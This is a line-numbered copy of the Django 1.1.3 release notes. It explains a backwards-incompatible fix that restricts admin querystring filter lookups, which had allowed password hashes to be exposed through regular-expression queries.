1. ==========================

  2. Django 1.1.3 release notes

  3. ==========================

  4. 

  5. Welcome to Django 1.1.3!

  6. 

  7. This is the third "bugfix" release in the Django 1.1 series,

  8. improving the stability and performance of the Django 1.1 codebase.

  9. 

  10. With one exception, Django 1.1.3 maintains backwards compatibility

  11. with Django 1.1.2. It also contains a number of fixes and other

  12. improvements. Django 1.1.2 is a recommended upgrade for any

  13. development or deployment currently using or targeting Django 1.1.

  14. 

  15. For full details on the new features, backwards incompatibilities, and

  16. deprecated features in the 1.1 branch, see the :doc:`/releases/1.1`.

  17. 

  18. Backwards incompatible changes

  19. ==============================

  20. 

  21. Restricted filters in admin interface

  22. -------------------------------------

  23. 

  24. The Django administrative interface, ``django.contrib.admin``, supports

  25. filtering of displayed lists of objects by fields on the corresponding

  26. models, including across database-level relationships. This is

  27. implemented by passing lookup arguments in the querystring portion of

  28. the URL, and options on the ModelAdmin class allow developers to

  29. specify particular fields or relationships which will generate

  30. automatic links for filtering.

  31. 

  32. One historically-undocumented and -unofficially-supported feature has

  33. been the ability for a user with sufficient knowledge of a model's

  34. structure and the format of these lookup arguments to invent useful

  35. new filters on the fly by manipulating the querystring.

  36. 

  37. However, it has been demonstrated that this can be abused to gain

  38. access to information outside of an admin user's permissions; for

  39. example, an attacker with access to the admin and sufficient knowledge

  40. of model structure and relations could construct query strings which --

  41. with repeated use of regular-expression lookups supported by the

  42. Django database API -- expose sensitive information such as users'

  43. password hashes.

  44. 

  45. To remedy this, ``django.contrib.admin`` will now validate that

  46. querystring lookup arguments either specify only fields on the model

  47. being viewed, or cross relations which have been explicitly

  48. allowed by the application developer using the preexisting

  49. mechanism mentioned above. This is backwards-incompatible for any

  50. users relying on the prior ability to insert arbitrary lookups.
About Sign Up Leave Feedback Contact